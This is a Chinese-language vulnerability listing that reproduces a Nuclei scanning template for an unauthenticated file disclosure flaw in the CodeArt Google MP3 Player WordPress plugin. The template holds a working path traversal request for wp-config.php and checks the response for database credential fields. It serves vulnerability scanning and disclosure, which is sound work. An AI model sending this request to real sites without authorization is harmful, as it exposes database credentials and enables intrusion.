wp-googlemp3-lfi: WordPress Plugin CodeArt Google MP3 Player - File Disclosure Download

日期: 2025-08-01 | 影响软件: WordPress Plugin CodeArt Google MP3 Player | POC: 已公开

漏洞描述

WordPress Plugin CodeArt Google MP3 Player allows an unauthenticated attacker to download file from server.

PoC代码[已公开]

id: wp-googlemp3-lfi

info:
  name: WordPress Plugin CodeArt Google MP3 Player - File Disclosure Download
  author: theamanrawat
  severity: critical
  description: |
    WordPress Plugin CodeArt Google MP3 Player allows an unauthenticated attacker to download file from server.
  reference:
    - https://www.exploit-db.com/exploits/35460
    - https://wordpress.org/plugins/google-mp3-audio-player/
  metadata:
    verified: "true"
    max-request: 1
    publicwww-query: "/wp-content/plugins/google-mp3-audio-player/"
  tags: wp-plugin,wp,wordpress,lfi,google-mp3-audio-player,unauth,disclosure,vuln

http:
  - raw:
      - |
        GET /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../wp-config.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_USER"
          - "DB_PASSWORD"
          - "DB_HOST"
        condition: and

      - type: word
        part: header
        words:
          - "application/octet-stream"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a5ebc48494b13066015c3b8c43b3f1645d7319a94dfcaf0a3dc91af8fbf5a835022100cabf1e6f73a067d65799cacf21117a545d8c711edf1a809d9c776b93bcf8cbc9:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/wordpress/wp-googlemp3-lfi.yaml